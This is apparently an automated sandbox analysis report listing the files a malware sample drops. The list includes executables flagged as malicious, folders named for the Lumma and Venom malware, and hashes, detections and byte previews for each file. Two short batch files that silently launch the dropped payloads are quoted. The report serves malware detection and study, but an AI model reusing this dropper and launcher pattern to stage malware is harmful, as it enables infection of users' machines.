Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428927" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FC8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jul 27 05:44:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	139238
Entropy (8bit):	2.103743257960153
Encrypted:	false
SSDEEP:	768:bzIM5zjfhz3wng7ojcyBjLodwCV4Xjjs0:fz5NT7owy9ciXP3
MD5:	B26639B7FFD11937CC768197632FFD7E
SHA1:	4B8F4F0FE2907897D2FAAE5CBEFC09BE65DA2063
SHA-256:	5DCAF6C889EE9FD7B44F5F68AA42A53DF09B688167F846F7D6B13ADF01CD4E0D
SHA-512:	F82D33F170DF210A8088D22CCF73C608F7439A5DEA0D86D072955D340720C9D01F9DC263CAF022E7EE70CE9275D8F8FF9B0ACE1F9D8BC01C507AAE24386B9182
Malicious:	false
Preview:	MDMP..a..... .......Z..f........................\|...........,...d"......T....[..........`.......8...........T............F...............#..........\|%..............................................................................eJ.......&......GenuineIntel............T.......\...?..f............................. ..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER40B3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6332
Entropy (8bit):	3.7291341369059827
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb0v6LJoYeuQE/PfT5aM4U789bsmsfROEm:R6l7wVeJ0v6LJoYXJpr789bsmsfROEm
MD5:	BC6CD7A0E67B592A647353A3C8B95C1E
SHA1:	9862DD8F1DC0FF2DB3E483EB63E5A786F838C74C
SHA-256:	4BF23D340E3FABD061C95F64503FA5CD05E97099DBA191AB73D767B93C75D391
SHA-512:	FCF7D35555D247864E616BE6BD73AE1969E968D7E3F4072611CB6A869AE0FFEB387F23A54996B880C27CACDF85F11142BA2DE9D4EB8C976359A0DC2F8F0EFE8F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER40D3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.471919759033641
Encrypted:	false
SSDEEP:	48:cvIwWl8zsoJg77aI9l/WWpW8VYL0Ym8M4JFDD09hFE+q8v1RROMyoO3c1d:uIjfuI7n/37VIJtLkNyoOM1d
MD5:	FD8CB11D840E0E2D0F91967F383A5B25
SHA1:	C81F5F1991D3053A33175837C2C5BBF2A6A2B7FE
SHA-256:	778A6B39018AAA4BE12FDF92489055210E5048D8765B7D7B057A85088A7816B8
SHA-512:	B561D5FACA5C90613469C507E587A73611E24847A2CBC600A0D3A2456DD7B8A4DC78C86BCC532E0F229B3E01BC0DA845830F7E9A3A8C706E32C13361771F18B7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428927" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2D42.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\2D42.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1515
Entropy (8bit):	5.3602768626210215
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	366F3274873188864F1C9DC2A155FE99
SHA1:	DC6D430ADC2BF68980D60D32832F937A19002970
SHA-256:	942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
SHA-512:	1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vm.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	942
Entropy (8bit):	5.350509596383769
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKnYHKh3oPtHo6hAHKzeR
MD5:	B6D3844EAA406C781DC083A57D80B31D
SHA1:	A86C11005B4765CF80CE96F09686B601DD3F87D7
SHA-256:	FC52CE6F1AE1858EFB752C50FD39D3FD82CC2605B95E94B9C16FB9220BC25D20
SHA-512:	08CD3FFA613D2A95564DFEBBE5C9CFB3CA7B903BAF0F1105AECB039420C9126B06A1CA6D7DA562F18DB1C28B4877D84C98AE74C7AB4799DE8B8C5381F4390462
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1019
Entropy (8bit):	5.236946495216897
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm4ymNib0O0bihmCetmKg6CUXyhmimKgbxdB6hmjmKgz0JahmcmKgbR:YqHZ6T06McoEb0O0bicCewHDUXycLHbR
MD5:	5D20D9B3F928AC964E07C561FD8A3F42
SHA1:	B702BE149FCF94831A975F2CD06B2DFE020D9632
SHA-256:	59A4F22870D7A7DC3339917C89FF6AF09FA762AF39F0624338FDDFF631730492
SHA-512:	30E5F275FFB475A403439C3A4DCC05F3E12A6914D93F20EB38AF3240A7F693A455C25C005A3681AB39C89BFAD9AE66FAAE3874B987FAC48BB6A5439194FDCEDC
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":7763552,"LastSwitchedHighPart":31061488,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":4292730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4282730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4272730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4262730848,"LastSwitchedHighPart":31061487,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4252730848,"LastSwitchedHighPart":31061487,"Pr

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\Microsoft.Explorer.Notification.{137FF6BE-F11F-34B5-03D0-7AC7965D6722}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	404
Entropy (8bit):	7.237769240723788
Encrypted:	false
SSDEEP:	12:6v/78/vlRYiss4zKRkj051UImYiyx5NDqxa5U6:16/KSI/mODN+xh6
MD5:	3905593FDAF39CF1418D923565E08345
SHA1:	20B73D80CADF71956847FFBE0E264811D03680EE
SHA-256:	156521BB822C49F02192EFB0062095AC0710A36E02F50D72F26AAD6C50F27479
SHA-512:	6EF1E8F393AC0FD89D58E29F44602E21AD3829F47CE9FE43C9E8F9F2F14FCEBAC3A2F04DE8671767F57922C0144FBDEE812548DC6DB25CBC800271AD25D9102D
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a....>IDAT8O.?K.A..g.lDlUr`c#.$...m.S.(...6..E..+...H@..pIk."....k.Bo\|sY<m...?nwf...]...1....\..x..!.YFT..'&..Q.u.5...=.u..NY...+s.u-.p.q..C..y..s...+$.E...i..N......%vO.?...BZ%v:}..;X.Y..Vx.....o.........aoj6..../P7u5.L.-.2..x..s.E?B...1=.o.7.K..;...sd......vl......5..}L.4..^.......&...+.s.....6..j....;..huC-.<....IEND.B`.

C:\Users\user\AppData\Local\Temp\2D42.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	141944
Entropy (8bit):	5.653169478479977
Encrypted:	false
SSDEEP:	1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
MD5:	B6A1C0998D0A7979C9EC17B8D5CF8A81
SHA1:	32154E9BDCD0975A4095A88B68834E2DA21412DD
SHA-256:	4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
SHA-512:	80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 7Y18r(14).exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..................J.(.....(....}.....0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z..{....o....,.rs..ps....z..}.......0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(.....s....t......0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........V.(......}......}....*...0..........

C:\Users\user\AppData\Local\Temp\8EC7.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	7.331838963074561
Encrypted:	false
SSDEEP:	24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
MD5:	2B3ECC21382E825D6FE0812A717717EB
SHA1:	F3386531F7726A4F673003BF6CB5806843B76FFB
SHA-256:	AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
SHA-512:	7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\EF14.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	11672576
Entropy (8bit):	6.48028581980635
Encrypted:	false
SSDEEP:	98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
MD5:	D3785ED170CDB1F4784D3DFF3A61DAE0
SHA1:	4BB2D65976DB66FC918C354AA4B2D1162B2420BA
SHA-256:	505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
SHA-512:	3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\EF14.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 7Y18r(14).exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	338427
Entropy (8bit):	7.999421481430211
Encrypted:	true
SSDEEP:	6144:NGuYnZvCloK9BLa2VS1T6dH5IxUt/eiFLj//4RLu7HuayKy8R5spw0:EuYhClokzVjdyx6Tj/gRsHpyKy8wS0
MD5:	CCC6A76DAC238257CF8CFFE352B3E5C4
SHA1:	B2705A5A08E1FAA0E4D3097F79EA9FD09C8189FA
SHA-256:	3C2768836296463361FFBC8F105F713B1059EA6F22C3272FFB9C77D41CA86024
SHA-512:	611628A9D2F81012A04F6B5E8A43C111ACF7DB1FED3042A4609A7FC8F6591775E013580A73F621B96F81D8B3C831F0698D7070451B6332E3076041C04097F42A
Malicious:	false
Preview:	`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^.....?...:gd.u.Z..6....oI..!.9...m.\|.0..7.oR..

C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.476456017363834
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdJI0CHhSnu/:hGwdxCHYno
MD5:	119839A00B05FCD9AED401736B817ACF
SHA1:	07F23D288EC1E8DE71F7D262D00172D419725EE2
SHA-256:	340034255D14BA5EE3E9F794064D81B675E2ACA6452D86F461583577C051EAF4
SHA-512:	545C68B5BB9B8249D8FEDA76792D9279AEE0482E26C261B9F2A5FE97D3496D208A6DB31BE3536D947CE1AF895AEA65365E9935738268129C8A6AC5FD3CC5CBD2
Malicious:	false
Preview:	@echo off..start "" /b "lm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106495
Entropy (8bit):	7.9980244323728495
Encrypted:	true
SSDEEP:	3072:8cK8hPo9OmXlpd2zSAaSJAMCjOnjTaGcAXb87:8toOhl2mAaSOFIT6AXw7
MD5:	3D5A228A61FC2FBFAFB6D63A6F6C77A7
SHA1:	D76DDCBB0EEF778F5C72B628A5696B8F67EDD32C
SHA-256:	1D6C79DFFF9E47928457C86CDEFAEAAB185B3476FD3F568AD668252CD53F8877
SHA-512:	1B04BCA4C65377B406E04A8267CAB9B5D853B5E339A3B2AEC6ECEB70A8C3A64CBA5DE390193F9CC0DD26A7B57A0C520622DAE9DFAF2EB3202C7EAA3D48DA5CD5
Malicious:	false
Preview:	`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P.K....Q3.QJ>YZ.....*Hz..T.IX.t.+2.eO.$.8R

C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.517272343894447
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdTCHhSnu/:hGwdWHYno
MD5:	1AB4DC21DCB24F5B7345CE5C0B794B82
SHA1:	18F722AD31EE9D81181F8CA2CEF60A70B03BB030
SHA-256:	AC2103023D146E62C3B708384AE0ED044D17258901272068EF93C15C9F5AA06E
SHA-512:	83F1D566B8F5B7875811762433CF7C2722225C789A3B917B2C4184A442D9D6AF9C6FE703CE354D223824CFE8ED86E6E7780EC02008C093298FBCD3C08840DBDD
Malicious:	true
Preview:	@echo off..start "" /b "vm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
